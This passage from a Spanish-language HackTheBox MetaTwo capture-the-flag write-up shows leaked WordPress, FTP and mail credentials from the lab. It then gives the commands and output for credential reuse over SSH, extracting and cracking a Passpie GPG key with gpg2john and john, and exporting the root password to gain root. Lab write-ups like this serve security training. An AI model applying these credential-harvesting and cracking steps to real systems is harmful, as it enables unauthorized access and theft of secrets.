39define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );
40
41/**
42 * WordPress Database Table prefix.
43 */
44$table_prefix = 'wp_';
45
46/**
47 * For developers: WordPress debugging mode.
48 * @link https://wordpress.org/support/article/debugging-in-wordpress/
49 */
50define( 'WP_DEBUG', false );
51
52/** Absolute path to the WordPress directory. */
53if ( ! defined( 'ABSPATH' ) ) {
54 define( 'ABSPATH', __DIR__ . '/' );
55}
56
57/** Sets up WordPress vars and included files. */
58require_once ABSPATH . 'wp-settings.php';
Vemos las credenciales de la base de datos
1/** MySQL database username */
2define( 'DB_USER', 'blog' );
3/** MySQL database password */
4define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );Y también vemos las credenciales para acceder al FTP
1define( 'FS_METHOD', 'ftpext' );
2define( 'FTP_USER', 'metapress.htb' );
3define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
4define( 'FTP_HOST', 'ftp.metapress.htb' );
5define( 'FTP_BASE', 'blog/' );
6define( 'FTP_SSL', false );Estas credenciales no son válidas para acceder por SSH
1$ ssh janderson@metapress.htb
2janderson@metapress.htb's password:
3Permission denied, please try again.
4janderson@metapress.htb's password:
5Permission denied, please try again.
6janderson@metapress.htb's password:
Information Leakage -> Foothold
Podemos iniciar sesión por FTP
1$ ftp metapress.htb@ftp.metapress.htb
2Connected to ftp.metapress.htb.
3
4220 ProFTPD Server (Debian) [::ffff:10.129.228.95]
5331 Password required for metapress.htb
6Password:
7230 User metapress.htb logged in
8Remote system type is UNIX.
9Using binary mode to transfer files.
10ftp>
Nos encontramos un archivo send_email.php dentro del directorio mailer
1ftp> dir
2229 Entering Extended Passive Mode (|||25193|)
3150 Opening ASCII mode data connection for file list
4drwxr-xr-x 5 metapress.htb metapress.htb 4096 Oct 5 2022 blog
5drwxr-xr-x 3 metapress.htb metapress.htb 4096 Oct 5 2022 mailer
6226 Transfer complete
7ftp> cd mailer
8250 CWD command successful
9ftp> dir
10229 Entering Extended Passive Mode (|||42441|)
11150 Opening ASCII mode data connection for file list
12drwxr-xr-x 4 metapress.htb metapress.htb 4096 Oct 5 2022 PHPMailer
13-rw-r--r-- 1 metapress.htb metapress.htb 1126 Jun 22 2022 send_email.php
1<?php
2/*
3 * This script will be used to send an email to all our users when ready for launch
4*/
5
6use PHPMailer\PHPMailer\PHPMailer;
7use PHPMailer\PHPMailer\SMTP;
8use PHPMailer\PHPMailer\Exception;
9
10require 'PHPMailer/src/Exception.php';
11require 'PHPMailer/src/PHPMailer.php';
12require 'PHPMailer/src/SMTP.php';
13
14$mail = new PHPMailer(true);
15
16$mail->SMTPDebug = 3;
17$mail->isSMTP();
18
19$mail->Host = "mail.metapress.htb";
20$mail->SMTPAuth = true;
21$mail->Username = "jnelson@metapress.htb";
22$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
23$mail->SMTPSecure = "tls";
24$mail->Port = 587;
25
26$mail->From = "jnelson@metapress.htb";
27$mail->FromName = "James Nelson";
28
29$mail->addAddress("info@metapress.htb");
30
31$mail->isHTML(true);
32
33$mail->Subject = "Startup";
34$mail->Body = "<i>We just started our new blog metapress.htb!</i>";
35
36try {
37 $mail->send();
38 echo "Message has been sent successfully";
39} catch (Exception $e) {
40 echo "Mailer Error: " . $mail->ErrorInfo;
41}Contiene credenciales para jnelson en un servicio de mensajería, vamos a probar si se reutilizan credenciales esta vez.
1$ sshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh jnelson@metapress.htb
2Linux meta2 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
3
4The programs included with the Debian GNU/Linux system are free software;
5the exact distribution terms for each program are described in the
6individual files in /usr/share/doc/*/copyright.
7
8Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
9permitted by applicable law.
10Last login: Tue Oct 25 12:51:26 2022 from 10.10.14.23
11jnelson@meta2:~$ whoami
12jnelson
Y vemos que sí.
Podemos ver la flag de usuario.
1jnelson@meta2:~$ cat user.txt
2d20d0fec8615....
Privilege Escalation
En el directorio personal de jnelson vemos un directorio oculto .passpie esto me llamó la atención ya que no se que es.
Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface. Use a master passphrase to decrypt login credentials, copy passwords to clipboard, syncronize with a git repository, check the state of your passwords, and more.
Una vez sabiendo que es…
1jnelson@meta2:~$ passpie init
2Error: Path exists '/home/jnelson/.passpie'. `--force` to overwrite
3jnelson@meta2:~$ passpie
4╒════════╤═════════╤════════════╤═══════════╕
5│ Name │ Login │ Password │ Comment │
6╞════════╪═════════╪════════════╪═══════════╡
7│ ssh │ jnelson │ ******** │ │
8├────────┼─────────┼────────────┼───────────┤
9│ ssh │ root │ ******** │ │
10╘════════╧═════════╧════════════╧═══════════╛
11jnelson@meta2:~$ passpie copy root
12Passphrase:
13Error: Wrong passphrase
Vemos que passpie alberga la credencial de root pero al probar si la credencial de janderson se reutilizaba aquí vemos que no.
Password files are encrypted using GnuPG and saved into yaml text files. Passpie supports Linux, OSX and Windows.
Esto significa que la contraseña de root debe de encriptada en formato GPG.
Fácilmente podemos encontrar donde está esta credencial.
1jnelson@meta2:~/.passpie/ssh$ ls
2jnelson.pass root.pass
1jnelson@meta2:~/.passpie/ssh$ cat root.pass
2comment: ''
3fullname: root@ssh
4login: root
5modified: 2022-06-26 08:58:15.621572
6name: ssh
7password: '-----BEGIN PGP MESSAGE-----
8
9
10 hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
11
12 nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
13
14 yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
15
16 /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
17
18 iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
19
20 krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
21
22 mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
23
24 lpF0RatbxQGWBks5F3o=
25
26 =uh1B
27
28 -----END PGP MESSAGE-----
29
30 '
Existe una utilidad llamada gpg2john para convertir una clave privada en formato crackeable.
Podemos intentar eso.
El archivo oculto .keys contiene tanto la clave pública como privada utilizada para encriptar las credenciales.
1jnelson@meta2:~/.passpie$ ls -la
2total 24
3dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 2022 .
4drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 2022 ..
5-r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config
6-r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys
7dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 2022 ssh
1$ gpg2john .keys
2
3File .keys
4Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::.keys
Ahora podemos intentar crackear este hash con john
1$ john -w=/usr/share/wordlists/rockyou.txt hash
2Using default input encoding: UTF-8
3Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
4Cost 1 (s2k-count) is 65011712 for all loaded hashes
5Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
6Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
7Will run 4 OpenMP threads
8Press 'q' or Ctrl-C to abort, almost any other key for status
9blink182 (Passpie)
101g 0:00:00:01 DONE (2024-08-27 16:20) 0.6993g/s 114.6p/s 114.6c/s 114.6C/s ginger..blink182
11Use the "--show" option to display all of the cracked passwords reliably
12Session completed.
Y la passphrase es blink182
Ahora podemos exportar las credenciales a un archivo donde están las credenciales en texto claro.
1jnelson@meta2:~/.passpie$ passpie export /tmp/passwords.db
2Passphrase:
3jnelson@meta2:~/.passpie$
1jnelson@meta2:~/.passpie$ cat /tmp/passwords.db
2credentials:
3- comment: ''
4 fullname: root@ssh
5 login: root
6 modified: 2022-06-26 08:58:15.621572
7 name: ssh
8 password: !!python/unicode 'p7qfAZt4_A1xo_0x'
9- comment: ''
10 fullname: jnelson@ssh
11 login: jnelson
12 modified: 2022-06-26 08:58:15.514422
13 name: ssh
14 password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
15handler: passpie
16version: 1.0
Vemos que la credencial de root es p7qfAZt4_A1xo_0x y ya podríamos migrar al superusuario.
1jnelson@meta2:~/.passpie$ su -
2Password:
3root@meta2:~# id
4uid=0(root) gid=0(root) groups=0(root)
Podemos leer la flag de root
1root@meta2:~# cat /root/root.txt
243013fd43ba23....
¡Y ya estaría!
Happy Hacking! 🚀
#HackTheBox #MetaTwo #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #RCE #Exploit #Linux #HTTP Enumeration #SQL Injection #Hash Cracking #CVE-2021-29447 #XXE #Information Leakage #Abusing Passpie #Privilege Escalation